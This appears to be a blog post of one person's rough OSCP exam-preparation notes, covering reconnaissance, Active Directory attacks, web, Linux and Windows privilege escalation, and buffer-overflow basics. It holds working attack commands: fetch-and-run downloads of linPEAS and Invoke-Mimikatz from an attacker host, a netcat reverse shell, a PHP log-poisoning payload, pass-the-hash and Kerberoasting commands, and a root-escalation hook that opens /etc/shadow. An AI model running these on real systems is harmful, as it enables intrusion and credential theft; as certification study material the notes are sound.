21 April 2022
I passed my OSCP in 2022 and wanted to contribute to the many helpful posts providing tips, tricks, and resources. I would also recommend referencing my GitBook for additional tooling and methodology.
Please keep in mind while reading this post that these are pretty much a direct copy of my rough notes. As a result, there may be some unfinished thoughts, commands, and checklists contained within. Simple checklists help me not overthink - which coincidentally is my piece of advice for anyone attempting the OSCP.
Make sure while studying for the OSCP that you take lots of breaks, enjoy some coffee, and spend time with your friends and family. It’s no secret that the OSCP is tough, but struggling to exploit a machine or pass the first time doesn’t mean you’re any less of a hacker than the rest of us.
These are articles that Offensive Security has created that answer several questions you may have about the exam, for example what tooling is allowed and what the exam structure looks like.
Resources from the community that I found helpful while preparing for my exam.
Resources that I recommend checking out while preparing for the OSCP. For my preparation, I completed every Proving Grounds Practice machine and several NetSecFocus HackTheBox recommendations. Additionally, I found S1REN's walkthroughs incredibly helpful; they provide a great view of how you should be tackling machines.
This is my generic checklist and a baseline for every single box:
```bash
# Full TCP port range with version detection and default scripts
nmap -sV -sC -p- --min-rate=1000 -iL [scope] -oA Full-TCP-Scan
# Top 1000 UDP ports with default scripts (UDP is slow even with --min-rate)
nmap -sUC --top-ports 1000 --min-rate=1000 -iL [scope] -oA Top-1000-UDP-Scan
# DNS zone transfer: needs the domain name as well as the server to ask
dig axfr $domain @$ip
```
Simple notes for Active Directory during the OSCP:
```cmd
# Enumerate all local users
net user
# Enumerate all users in the domain
net user /domain
# Enumerate a specified user
net user $username /domain
```
1. Gain access to a domain user account.
2. Enumerate the domain with the commands listed above.
3. Enumerate all computers on the domain. Don't just enumerate one computer; enumerate them all.
4. Enumerate all users logged onto computers that we have local administrator access to.
5. Kerberoast with any user account acquired (GetUserSPNs, Invoke-Kerberoast, etc.).
6. Attempt credential-based attacks against all discovered user accounts.
7. Pass the Hash to pivot (also try Pass the Ticket if applicable).
8. Run Mimikatz on all systems (can also run lsassy with CrackMapExec).
9. Enumerate password hashes and tickets: `sekurlsa::logonpasswords` and `sekurlsa::tickets`.
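For steps 7 and 8, here is an added shell helper (not from the original post) that turns a SAM dump in the `user:rid:lmhash:nthash:::` format printed by impacket-secretsdump and CrackMapExec's `--sam` into the `-hashes LM:NTLM` argument that impacket's psexec expects, and refuses accounts whose NTLM hash is the well-known empty-password hash, since passing that hash only wastes time. The dump below is constructed: the account names, the non-empty hash values and the target IP are invented.

```bash
#!/usr/bin/env bash
# Turn a SAM dump into pass-the-hash invocations. Added example; the dump is constructed.
set -eu

# Constructed sample in the uid:rid:lmhash:nthash::: format of impacket-secretsdump.
# The LM hash is the standard "no LM hash" value; Guest's NTLM is the empty-password hash.
SAMPLE_SAM_DUMP="$(mktemp)"
cat > "$SAMPLE_SAM_DUMP" <<'EOF'
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
EOF

# NTLM hash of the empty string: an account with this hash has a blank password or is disabled.
EMPTY_NTLM=31d6cfe0d16ae931b73c59d7e0c089c0

# Print LM:NTLM for one account (the shape impacket's -hashes flag takes); fail if absent.
hashes_for_user() {
    awk -F: -v u="$1" \
        '$1 == u && length($3) == 32 && length($4) == 32 { print $3 ":" $4; found = 1 }
         END { exit !found }' "$2"
}

# Build the pass-the-hash command for one account against one target.
pth_cmd() {
    local user=$1 dump=$2 target=$3 hashes
    hashes=$(hashes_for_user "$user" "$dump") || { echo "no hash for $user" >&2; return 1; }
    case "$hashes" in
        *:"$EMPTY_NTLM") echo "$user has the empty NTLM hash (blank password or disabled); skipping" >&2; return 1 ;;
    esac
    printf 'impacket-psexec -hashes %s %s@%s\n' "$hashes" "$user" "$target"
}

# Demo against the constructed dump (target IP is an assumption).
pth_cmd Administrator "$SAMPLE_SAM_DUMP" 10.10.10.10
```

Loop `pth_cmd` over every account in the dump and every host you have discovered to cover step 7 systematically; the same `LM:NTLM` string also feeds `crackmapexec smb ... -H` and the `-hashes` flag of the other impacket tools.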
This checklist serves as a very basic web server checklist:
Check `robots.txt` to enumerate any additional information about the site.
Try default credentials such as `admin:admin`, or credentials identified via Google for the application.
This checklist serves as a very basic Windows checklist:
- Run SMBMap against any identified SMB services: `smbmap -H $ip`
- Access SMB shares manually with smbclient: `smbclient //$ip/$share` (forward slashes avoid having to escape backslashes in the shell)
- Revisit all services (SSH, SMB, FTP, HTTP, ...) with any identified credentials.
- Get the naming context of LDAP: `ldapsearch -x -H ldap://$ip -s base namingcontexts` (the older `-h $ip` form is deprecated by newer OpenLDAP clients in favour of `-H ldap://$ip`)
- After identifying the naming context, enumerate more: `ldapsearch -x -H ldap://$ip -b "DC=htb,DC=local"`
- Enumerate RPC with rpcclient, trying a null session first: `rpcclient -U '' -N $ip`
- Some interesting rpcclient commands are `enumdomusers`, `queryuser parzival`, `querydomgroups` and `querydispinfo`
- Enumerate LDAP with credentials: `ldapsearch -x -H ldap://$ip -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"`
If WebDAV is enabled, test which file types can be uploaded and executed (and whether a backdoor can be dropped) with davtest:

```bash
davtest -auth $user:[PASSWORD] -sendbd auto -url http://$ip
```
This checklist serves as a reminder of what I needed to install prior to taking my OSCP exam; you don't want to spend the first few hours of your exam setting up an environment:
```bash
# Full-TCP-Scan
nmap -sV -sC -p- --min-rate 1000 -T4 $ip -oA Full-TCP-Scan
# Top-UDP-Scan
nmap -sU --top-ports 1000 -T4 $ip -oA Quick-UDP-Scan
# Vulnerability Scan (only against the ports the full scan found open)
nmap -p $discoveredports --script=vuln $ip -oA Vuln-Scan
```
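The vulnerability scan above needs `$discoveredports`, which the full scan already produced. The following added shell helper (not from the original post, and applying equally to the `-iL [scope]` scans at the top of the page) pulls the open TCP ports out of the `Full-TCP-Scan.gnmap` file that `-oA` writes and assembles the vuln-scan command from them. The `.gnmap` content below is a constructed sample and the target IP is an assumption.

```bash
#!/usr/bin/env bash
# Chain the full TCP scan into the vuln scan by parsing nmap's greppable output.
# Added example; the .gnmap content is constructed.
set -eu

# Constructed sample of what `nmap ... -oA Full-TCP-Scan` writes to Full-TCP-Scan.gnmap.
SAMPLE_GNMAP="$(mktemp)"
cat > "$SAMPLE_GNMAP" <<'EOF'
# Nmap 7.92 scan initiated as: nmap -sV -sC -p- --min-rate 1000 -T4 10.10.10.10 -oA Full-TCP-Scan
Host: 10.10.10.10 () Status: Up
Host: 10.10.10.10 () Ports: 22/open/tcp//ssh//OpenSSH 7.9p1/, 80/open/tcp//http//Apache httpd 2.4.38/, 139/filtered/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds/// Ignored State: closed (65531)
# Nmap done -- 1 IP address (1 host up) scanned in 120.00 seconds
EOF

# Print the open TCP ports in a .gnmap file as a sorted, comma-separated list
# (filtered/closed ports are left out; multiple hosts are merged into one list).
open_ports_from_gnmap() {
    grep '^Host:' "$1" | grep -o '[0-9]*/open/tcp' | cut -d/ -f1 | sort -nu | paste -sd, -
}

# Build the follow-up vuln scan for a target from its .gnmap file; fail if nothing was open.
vuln_scan_cmd() {
    local ports
    ports="$(open_ports_from_gnmap "$1")"
    [ -n "$ports" ] || { echo "no open TCP ports found in $1" >&2; return 1; }
    printf 'nmap -p %s --script=vuln %s -oA Vuln-Scan\n' "$ports" "$2"
}

# Demo: prints the command you would run next (pipe it into sh to execute).
vuln_scan_cmd "$SAMPLE_GNMAP" 10.10.10.10
```

Against a real scan, point `vuln_scan_cmd` at `Full-TCP-Scan.gnmap`; the function only prints the command, so you can review the port list before spending scan time on `--script=vuln`.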
While `nmap -sC` should successfully enumerate users through an exposed ident service, it is always good to double check which user owns each listening service:

```bash
ident-user-enum $ip 22 53 113
```
Try requesting pages with a crawler User-Agent, in case the application serves different content to search engines:

```
User-Agent: Googlebot/2.1 (+http://www.googlebot.com/bot.html)
```
Look for a `cgi-bin` directory and scripts ending in `.cgi` or `.sh`. This directory exists when Apache hands a request over to bash or another scripting language.
If a username is identified, for example `parzival`, try to log in with the password `parzival` as well (username reused as password).
Use the SMTP `VRFY` command to enumerate a valid email address or user prior to sending anything to the mail server.
If a local file inclusion lets you read the web server's access log, poison the log by sending a request with a PHP payload in the User-Agent header, then include the log file and supply the command in the `c` parameter:

```
User-Agent: <?php system($_GET['c']); ?>
```
Check the `.ssh` directory of any users that have been enumerated for an `id_rsa` file.
Run linPEAS straight from your web server without writing it to disk (adjust the IP and port to your own listener):

```bash
curl 10.10.10.1:8080/linpeas.sh | bash
```
```bash
# Which useful interpreters, compilers and transfer tools are available on the target?
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null
```
Try the local MySQL root account; check whether it has no password or reuses one already found:

```bash
mysql -u root -p
```
If the current user is in the `docker` group, mount the host's root filesystem into a container and chroot into it for a root shell (any locally available image works):

```bash
docker run -v /:/mnt --rm -it [IMAGE] chroot /mnt sh
```
Kali ships with PowerShell privilege escalation scripts such as `Invoke-MS16032`; the accompanying `Mimikatz.ps1` is also great. Both can be found in Kali's PowerShell Empire and PowerSploit directories (`locate` them by filename).
```cmd
# Search the current user's registry hive for stored passwords
reg query HKCU /f password /t REG_SZ /s
reg query HKCU /f pass /t REG_SZ /s
```
```powershell
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.10.1:8080/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.119.164:8080/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -Command lsadump::sam
```

Both require a high-integrity (administrator) process, and dumping the SAM additionally needs SYSTEM-level access, so run these only after local privilege escalation.
Check `C:\Program Files` and `C:\Program Files (x86)` for any outdated and vulnerable installations.
If credentials for a privileged account are known, use the `runas` command in combination with a binary like netcat:

```cmd
runas /env /profile /user:[DOMAIN]\Administrator "C:\Windows\Tasks\nc.exe -e cmd.exe $attackerip 443"
```

Note that `runas` reads the password from the console and cannot take it as an argument, so it generally fails from a non-interactive reverse shell; use it from an RDP or other interactive session, or fall back to a PowerShell credential object.
Some additional resources I referenced throughout Windows privilege escalation:
Once the privileged script imports this module and calls its hooks, we can privesc in multiple ways. For example, we can add a root user to the now world-writable `/etc/passwd` file, or run `/bin/bash -p` against the SUID-enabled bash to obtain a shell with root privileges.

```python
import os

# Each hook is invoked by the privileged script, so every command below runs as root.
def stop(text, value):
    os.system("chmod 777 /etc/passwd")   # make /etc/passwd writable so a root user can be appended

def reset(text, value):
    os.system("chmod +s /bin/bash")      # set SUID on bash; `/bin/bash -p` then keeps root privileges

def start(text, value):
    os.system("chmod 777 /etc/shadow")   # make /etc/shadow writable (and readable for hash cracking)
```
```bash
# Kerberoast with impacket, authenticating as a machine account with its NTLM hash (no cleartext needed)
GetUserSPNs.py -request 'DOMAIN/MACHINE$' -dc-ip $dcip -hashes 'LM:NTLM'
```
```cmd
net user /domain          # all domain users
net user $user /domain    # details of one user: groups, last logon, password policy
net group /domain         # all domain groups
```
Run `klist` to see if there are any tickets stored in memory. This can also be performed with Mimikatz by running `sekurlsa::tickets`.
Crack any captured TGS-REP hashes with `tgsrepcrack.py` or your favorite password cracking tool.
PowerView commands for situational awareness and Kerberoasting:

- `Get-NetLoggedOn -ComputerName [COMPUTER]`: enumerate users logged on to a computer
- `Get-NetSession -ComputerName [DC]`: enumerate sessions on the domain controller
- `Get-NetUser -SPN | select serviceprincipalname`: list accounts with SPNs, i.e. Kerberoast targets
- `Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash`: perform Kerberoasting with [Invoke-Kerberoast](https://www.pentestpartners.com/security-blog/how-to-kerberoast-like-a-boss/) and output hashcat-ready hashes
- curl: `curl http://$attackerip/winpeas.exe -o winpeas.exe`
- wget: `wget http://$attackerip/winpeas.exe -O winpeas.exe`

In Windows PowerShell, `curl` and `wget` are aliases for `Invoke-WebRequest`, so both work there; in cmd.exe, `curl.exe` ships with Windows 10 1803 and later, but `wget` does not exist.
1. Start an SMB share on Kali: `impacket-smbserver parzival [TARGET_DIRECTORY] -smb2support` (modern Windows hosts have SMB1 disabled, so `-smb2support` is usually required)
2. Validate the share is accessible: `net view \\$attackerip`
3. Copy the file to a local directory: `copy \\$attackerip\parzival\winpeas.exe`
4. Alternatively, run the file directly from the SMB share: `\\$attackerip\parzival\winpeas.exe`
```powershell
(New-Object System.Net.WebClient).DownloadFile("http://$attackerip/winpeas.exe", "C:\Windows\Temp\winpeas.exe")
Invoke-WebRequest "http://$attackerip/winpeas.exe" -OutFile "C:\Windows\Temp\winpeas.exe"
powershell.exe -c "iwr http://$attackerip/winpeas.exe -OutFile C:\Windows\Temp\winpeas.exe"
```
While the buffer overflow has since been removed from the exam environment, it still provides a great introduction to low-level exploit development. After obtaining your shiny new certification, I would still recommend checking out publicly available resources.
Common bad characters: NULL (`\0`, `\x00`), Tab (`\t`, `\x09`), Line Feed (`\n`, `\x0a`), Carriage Return (`\r`, `\x0d`) and Form Feed (`\f`, `\x0c`). Only `\x00` is bad for essentially every target; the others depend on how the application parses its input, so confirm them by sending the full byte range and comparing memory in the debugger rather than excluding them blindly.
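As an added example (not from the original post), here is a small shell helper that generates the byte string used to hunt for bad characters: every byte from `\x00` to `\xff` except the ones already confirmed bad, either as the `\xNN` escape string pasted into an exploit script or as raw bytes written to a file for sending over the socket. The starting exclusion list is the page's common bad characters; which bytes you remove from it as they are confirmed clean is up to you.

```bash
#!/usr/bin/env bash
# Generate the bad-character test string for a buffer overflow, omitting known bad bytes.
# Added example; the KNOWN_BAD list below is the page's common bad characters.
set -eu

# Print the decimal value of every byte 0x00..0xff not in the exclude list
# (space-separated lowercase hex, e.g. "00 0a 0d"), one per line.
allowed_bytes() {
    local exclude=" $1 " byte=0 hex
    while [ "$byte" -le 255 ]; do
        hex=$(printf '%02x' "$byte")
        case "$exclude" in
            *" $hex "*) ;;              # known bad byte: leave it out
            *) echo "$byte" ;;
        esac
        byte=$((byte + 1))
    done
}

# The \xNN escape form to paste into the exploit's badchars variable.
badchar_string() {
    local out="" byte
    for byte in $(allowed_bytes "$1"); do
        out="${out}\\x$(printf '%02x' "$byte")"
    done
    printf '%s\n' "$out"
}

# How many bytes the string contains; useful for sizing the buffer offset.
badchar_count() {
    allowed_bytes "$1" | wc -l | tr -d ' '
}

# The same bytes written raw, for a payload file. Octal escapes are used because
# POSIX printf does not understand \xNN.
badchar_bytes() {
    local byte
    for byte in $(allowed_bytes "$1"); do
        printf "\\$(printf '%03o' "$byte")"
    done
}

# Start from the page's common bad characters; drop a byte from this list once the
# debugger shows it survived in memory.
KNOWN_BAD="00 09 0a 0c 0d"
badchar_string "$KNOWN_BAD"
```

Send `badchar_bytes "$KNOWN_BAD" > badchars.bin` after the return-address offset, then compare the bytes in the debugger with the string printed by `badchar_string`: the first byte that differs or is truncated is your next bad character to add to the list.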